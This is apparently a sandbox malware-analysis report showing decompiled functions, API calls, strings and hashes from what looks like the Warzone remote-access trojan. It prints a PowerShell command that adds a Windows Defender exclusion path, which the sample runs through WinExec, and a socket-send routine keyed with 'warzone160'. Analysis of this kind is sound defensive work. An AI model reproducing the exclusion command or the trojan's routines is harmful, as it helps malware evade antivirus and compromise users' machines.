                                      0x00440db9
                                      0x00440dc2
                                      0x00440dce
                                      0x00440de2
                                      0x00440de9
                                      0x00440dee
                                      0x00440df6
                                      0x00440e09
                                      0x00440e1d

                                      APIs
                                        • Part of subcall function 004310AD: GetProcessHeap.KERNEL32(00000000,00000000,0043F750,00000800,00000000,00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000), ref: 004310B3
                                        • Part of subcall function 004310AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 004310BA
                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,00000000,0044131C), ref: 00440DCE
                                      • WinExec.KERNEL32(00000000,00000000), ref: 00440E14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocExecFileModuleNameProcess
                                      • String ID: powershell Add-MpPreference -ExclusionPath
                                      • API String ID: 1018710590-2194938034
                                      • Opcode ID: 61591f4922239fb1ff0582080b4f4e6afafa1469c415cd4038dbcc162a26aa5a
                                      • Instruction ID: 9362c9d4a2d22203e5655af7a500cba5875f7209c944e0269da56229bd248cb0
                                      • Opcode Fuzzy Hash: 61591f4922239fb1ff0582080b4f4e6afafa1469c415cd4038dbcc162a26aa5a
                                      • Instruction Fuzzy Hash: EEF0C8B19402407AE12433B35CCBF7B157CDF8D768F00142BF605A19D2D69C58414179
                                      Uniqueness

                                      Uniqueness Score: 37.75%

                                      Function 0043515A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E0043515A(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v12;
				char _v16;
				char _v24;
				void* _t21;
				void* _t38;
				intOrPtr _t39;
				void* _t40;

				_t37 = __edx;
				_t38 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) != 0xffffffff) {
					E00432E33( &_v24, __edx, E004331EC( &_v12, "warzone160"));
					_t31 = _v12;
					E00435A2D(_v12);
					_t39 = _a4;
					_t32 = _t40;
					E00432E79(_t40, _t39);
					E00432E79(_t40,  &_v24);
					_t7 =  &_v16; // 0x434b71
					_t21 = E00435C32(_t7, _t37, _t40, _t32, _v12, _t31);
					_t9 =  &_v16; // 0x434b71
					_t10 = _t38 + 0xc; // 0x4419af
					__imp__#19( *_t10,  *_t9,  *((intOrPtr*)(_t39 + 4)), 0);
					E00432E66( &_v16);
					E00432E66( &_v24);
					return 0 | _t21 != 0xffffffff;
				}
				return 0;
			}










                                      0x0043515a
                                      0x00435163
                                      0x00435169
                                      0x00435180
                                      0x00435185
                                      0x00435188
                                      0x0043518d
                                      0x00435192
                                      0x00435195
                                      0x004351a2
                                      0x004351a7
                                      0x004351aa
                                      0x004351b7
                                      0x004351ba
                                      0x004351bd
                                      0x004351ce
                                      0x004351d6
                                      0x00000000
                                      0x004351db
                                      0x00000000

                                      APIs
                                      • send.WS2_32(004419AF,qKC,?,00000000), ref: 004351BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: send
                                      • String ID: qKC$warzone160
                                      • API String ID: 2809346765-770954187
                                      • Opcode ID: 3d90c721c39e4b106d19413cab7f9175fbbe919c27dd26a522588c9c5048672d
                                      • Instruction ID: d01bd6d11efa4d175417c8d518e5e757baaacfcf9876ab58bfde7bed2be37f7c
                                      • Opcode Fuzzy Hash: 3d90c721c39e4b106d19413cab7f9175fbbe919c27dd26a522588c9c5048672d
                                      • Instruction Fuzzy Hash: C2019671910004BBDB04FBA5DD43DEFB768AF18324F50522EF122620D1EBB8AF0586A8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043FBFC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13windowUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043FBFC() {
				struct HWND__* _t1;
				void* _t4;
				struct HWND__* _t5;

				_t1 = E0043FA9F(_t4);
				_t5 = _t1;
				if(_t5 == 0) {
					MessageBoxA(_t1, "Settings not found !", "DEBUG", _t1);
				}
				return _t5;
			}






                                      0x0043fbfd
                                      0x0043fc02
                                      0x0043fc06
                                      0x0043fc14
                                      0x0043fc14
                                      0x0043fc1d

                                      APIs
                                      • MessageBoxA.USER32(00000000,Settings not found !,DEBUG,00000000), ref: 0043FC14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message
                                      • String ID: DEBUG$Settings not found !
                                      • API String ID: 2030045667-2996925740
                                      • Opcode ID: b78981e10081698370fd0c01f3edf2b5764fd21916285734f149673e49dce135
                                      • Instruction ID: a628e4584257f69c95a8ffbe8373ac5bc64d1e290ac620c07272c733416a25f9
                                      • Opcode Fuzzy Hash: b78981e10081698370fd0c01f3edf2b5764fd21916285734f149673e49dce135
                                      • Instruction Fuzzy Hash: D4C08C22EC0A322B152232A43D0AA6B09086A56B553011172BC00E7242CA8CCC0241DC
                                      Uniqueness

                                      Uniqueness Score: 100.00%